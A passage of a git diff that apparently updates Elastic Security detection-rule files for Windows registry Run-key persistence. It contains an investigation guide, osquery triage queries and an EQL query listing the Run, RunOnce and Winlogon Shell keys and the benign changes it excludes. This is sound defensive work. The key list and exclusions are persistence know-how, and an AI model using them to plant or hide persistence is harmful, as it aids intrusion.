+ "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. 
Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (process.name : \"OneDriveSetup.exe\" and\n registry.value : (\"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\") and\n registry.data.strings : \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\")\n",
 "related_integrations": [
 {
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_105.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_105.json
index 0d013fb27cb..206b2f4c6dd 100644
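Review bot: The new-side `note` string of the `_104` file still carries the unexpanded placeholders `$osquery_0` through `$osquery_3` where the `_105` file's hunk that follows carries the rendered `!{osquery{...}}` blocks, so if the `_104` rule version remains installable its investigation guide shows the literal `$osquery_N` text; the commit only normalizes the `\u003e` escapes and leaves this as it was. Both the `_104` and `_105` notes also contain the typo `These programs will executed under the context of the user`, which should read `These programs will be executed under the context of the user`. If these JSON files are exported from the rule source rather than hand-edited, both fixes belong upstream rather than in this diff.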
--- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_105.json
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Startup or Run Key Registry Modification", 
- "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n 
\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (process.name : \"OneDriveSetup.exe\" and\n registry.value : (\"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\") and\n registry.data.strings : \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\")\n", "related_integrations": [ { 
@@ -71,7 +71,7 @@
 ],
 "threat": [
 { 
- "framework": "MITRE ATT\u0026CK", 
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_106.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_106.json 
index 14de65aa45c..902582d9e93 100644 
--- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_106.json 
+++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_106.json 
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Startup or Run Key Registry Modification", 
- "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n 